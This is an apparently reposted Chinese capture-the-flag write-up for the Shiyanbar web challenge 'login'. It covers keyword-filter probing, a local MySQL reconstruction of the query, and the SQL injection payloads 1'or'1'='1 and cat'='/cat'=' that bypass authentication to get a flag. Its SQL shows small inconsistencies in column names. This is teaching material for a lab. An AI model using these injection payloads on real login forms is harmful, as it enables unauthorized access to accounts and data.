实验吧CTF_Web_登录一下好吗?
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实验吧CTF_Web_登录一下好吗?相关的知识,希望对你有一定的参考价值。
实验吧CTF---Web篇
1. 打开登录地址(http://ctf5.shiyanbar.com/web/wonderkun/web/index.html),发现为一个登录界面,第一想到的是查看源代码,没有发现其他信息,然后输入万能密码1‘or‘1‘=‘1,发现过滤了or ,但未过滤单引号(‘)等,如下图:
经过一些列测试,发现不但过滤了or,并且过滤了/ # -- select | union等。
猜测原SQL语句可能为:
select * form user where username = ‘ ‘ and password = ‘ ‘
在mysql上创建user表模拟该登录表的信息:
create database test; //创建test数据库 use test; create table user(username varchar(8), password varchar(32)); //创建user表 insert into user(username, password) values(‘test‘,‘123456‘); //插入数据 select * from user where name = ‘cat‘=‘‘ and passwd = ‘cat‘=‘‘; 可成功执行
如下图所示,可成功执行并返回数据库信息:
组合后代码为: select * from user where name = ‘cat‘=‘‘ and passwd = ‘cat‘=‘‘; 即payload: cat‘=‘/cat‘=‘
可成功登录并获取flag: ctf{51d1bf8fb65a8c2406513ee8f52283e7}
以上是关于实验吧CTF_Web_登录一下好吗?的主要内容,如果未能解决你的问题,请参考以下文章